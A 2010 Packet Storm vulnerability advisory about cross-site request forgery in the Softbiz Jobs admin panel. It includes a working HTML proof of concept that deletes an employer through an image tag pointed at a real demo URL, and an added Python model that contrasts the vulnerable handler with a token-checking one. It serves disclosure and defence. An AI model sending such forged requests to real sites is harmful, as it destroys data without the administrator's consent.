Softbiz Jobs Cross Site Request Forgery

2010-02-24T00:00:00
ID PACKETSTORM:86597
Type packetstorm
Reporter Pratul Agrawal
Modified 2010-02-24T00:00:00

Description

                                        
=======================================================================  
  
Softbiz Jobs CSRF Vulnerability  
=======================================================================  
  
by  
  
Pratul Agrawal  
  
  
# Vulnerability found in: Admin module  
  
# email Pratulag@yahoo.com  
  
# company aksitservices  
  
# Credit by Pratul Agrawal  
  
# Download http://www.softbizscripts.com/  
  
# Script softbizscripts  
  
# URL http://demos1.softbiz.com/scripts/seojobs/admin/  
  
  
  
# Proof of concept  
  
HTML page that deletes a registered employer through Cross Site Request Forgery. The admin endpoint delete_employer.php performs the deletion on a plain GET request and checks no anti-CSRF token, so an administrator who is logged in and merely loads a page containing this image tag deletes the employer whose id is given, with no further interaction:  
  
...................................................................................................................  
  
<html>  
<body>  
  <!-- the browser fetches the image URL with the admin's session cookie attached -->  
  <img src="http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=[USER ID]" />  
</body>  
</html>  
  
  
...................................................................................................................  
  
  
Example-  
...................................................................................................................  
  
<html>  
<body>  
  <img src="http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=20" />  
</body>  
</html>  
  
  
...................................................................................................................  
  
After an authenticated administrator loads the page, refresh the employer list in the admin panel: the user with id=20 has been deleted without the administrator having clicked anything.  
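Added illustration, not Softbiz code (the advisory does not reproduce delete_employer.php): the Python below models the reported behaviour, a handler that deletes on any GET carrying the admin session cookie, beside a hardened handler that insists on POST, checks the Origin/Referer against the site origin taken from the advisory URL, and verifies a per-session synchronizer token. The session id, token, employer ids, attacker origin and cookie name are constructed for the demo.

```python
"""Model of the delete_employer.php CSRF and one way to close it.

Illustration only: it is not the vendor's code. Session ids, employer ids,
the cookie name and the attacker origin are constructed for the demo.
"""
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "http://demos1.softbiz.com"      # origin from the advisory URL
ADMIN_SESSION = "sess-admin-1"                  # constructed admin session id
ADMIN_PATH = "/scripts/seojobs/admin/delete_employer.php"


@dataclass
class Request:
    method: str
    path: str
    query: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


@dataclass
class State:
    employers: set                 # employer ids currently registered
    sessions: dict                 # session id -> {"csrf": token}


def new_state():
    """Constructed fixture: three employers, one logged-in admin."""
    return State(employers={19, 20, 21},
                 sessions={ADMIN_SESSION: {"csrf": secrets.token_hex(16)}})


def vulnerable_delete(req, state):
    """Mirrors the reported behaviour: the only check is the session cookie,
    which the browser attaches to a cross-site <img> fetch automatically."""
    if req.cookies.get("PHPSESSID") not in state.sessions:
        return 403
    emp = req.query.get("id", "")
    if not emp.isdigit():
        return 400
    state.employers.discard(int(emp))
    return 200


def same_origin(req):
    """Accept only requests whose Origin (or Referer) is the site itself."""
    src = req.headers.get("Origin") or req.headers.get("Referer", "")
    return src == SITE_ORIGIN or src.startswith(SITE_ORIGIN + "/")


def hardened_delete(req, state):
    """State change only on POST, from the site's own origin, with a token
    bound to the session; the token comparison is constant-time."""
    sid = req.cookies.get("PHPSESSID")
    if sid not in state.sessions:
        return 403
    if req.method != "POST":
        return 405
    if not same_origin(req):
        return 403
    expected = state.sessions[sid]["csrf"]
    if not hmac.compare_digest(expected, req.form.get("csrf_token", "")):
        return 403
    emp = req.form.get("id", "")
    if not emp.isdigit() or int(emp) not in state.employers:
        return 404
    state.employers.discard(int(emp))
    return 200


def forged_get():
    """What the browser sends for <img src=".../delete_employer.php?id=20">
    on an attacker page: admin cookie attached, no token, foreign Referer."""
    return Request("GET", ADMIN_PATH, query={"id": "20"},
                   cookies={"PHPSESSID": ADMIN_SESSION},
                   headers={"Referer": "http://attacker.example/"})


def forged_post():
    """Same attack via an auto-submitted cross-site form (no token)."""
    return Request("POST", ADMIN_PATH, form={"id": "20"},
                   cookies={"PHPSESSID": ADMIN_SESSION},
                   headers={"Origin": "http://attacker.example"})


def legitimate_post(state):
    """Admin clicking Delete in the real panel: token rendered into the form."""
    return Request("POST", ADMIN_PATH,
                   form={"id": "20",
                         "csrf_token": state.sessions[ADMIN_SESSION]["csrf"]},
                   cookies={"PHPSESSID": ADMIN_SESSION},
                   headers={"Origin": SITE_ORIGIN})


def run_demo():
    """Returns {scenario: (status, employer 20 still present)}."""
    out = {}
    s = new_state(); out["vuln_forged_get"] = (vulnerable_delete(forged_get(), s), 20 in s.employers)
    s = new_state(); out["hard_forged_get"] = (hardened_delete(forged_get(), s), 20 in s.employers)
    s = new_state(); out["hard_forged_post"] = (hardened_delete(forged_post(), s), 20 in s.employers)
    s = new_state(); out["hard_legit_post"] = (hardened_delete(legitimate_post(s), s), 20 in s.employers)
    return out


if __name__ == "__main__":
    for name, (status, present) in run_demo().items():
        print(f"{name}: HTTP {status}, employer 20 present={present}")
```

Requiring POST alone is not a fix (the forged_post scenario shows a cross-site form reaches the handler just as easily); the token check is what stops it, and the origin check is a second, independent layer. On current browsers a SameSite attribute on the session cookie would add a third.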
  
  
#If you have any questions, comments, or concerns, feel free to contact me.   